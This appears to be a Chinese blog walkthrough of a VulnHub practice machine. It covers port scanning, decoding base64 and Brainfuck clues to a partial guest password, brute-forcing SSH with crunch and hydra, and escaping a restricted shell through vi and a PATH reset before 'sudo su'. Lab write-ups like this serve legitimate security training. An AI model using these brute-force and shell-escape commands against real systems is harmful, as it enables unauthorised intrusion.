下载链接:https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz
一、靶场配置
网卡配置为nat
二、主机探测与端口扫描
nmap 192.168.121.0/24
开放了22、80、31337端口
nmap 192.168.121.188 -p- -A -sV -Pn
访问80web服务
提示跟随白色兔子
f12查看源码,发现一个图片地址
图片名字指向了31337端口,我们打开它是白色兔子
访问31337端口看看
F12查看源码
发现一串base64加密的字符
ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=
对其进行解码,解出如下内容
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
是把一串内容写入到了 Cypher.matrix 文件中
访问该文件
发现其被下载,打开看看
可能是什么加密方式,搜了一下,是 Brainfuck 加密
使用工具对其进行解密
You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
说是能以 guest 用户进行登录 ,密码为 k1ll0rXX ,但是最后两位忘了,所以用XX代替,需要爆破一下
三、get shell
根据密码样式,最后两位大概率 小写字母+数字,使用kali中crunch工具生成字典
命令解释
crunch 8 8 -t k1ll0r%@ -o 1.txt
#参数
8 8:密码最小长度和最大长度
-t:使用特殊符号
%:0-9数字
@:小写字母
-o:输入到指定文件
用 hydra 工具进行密码爆破
hydra -l guest -P passwd.txt ssh://192.168.121.188
爆破出密码为:
k1ll0r7n
尝试ssh连接
ssh [email protected]
连接成功
四、提权
sudo -l
查看具有sudo权限的命令程序
无法使用
很多命令也无法使用,执行export看看
发现shell被限制
经过不断的尝试,vi命令可以使用
vi
按shift+:
!/bin/bash
发现还是无法执行一些命令,执行以下命令,配置环境变量绕过
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
添加完环境变量之后,直接sudo su,提权成功
标签:bin,命令,guest,密码,192.168,pentesting,ssh,basic,靶场 From: https://blog.csdn.net/weixin_68615160/article/details/140963385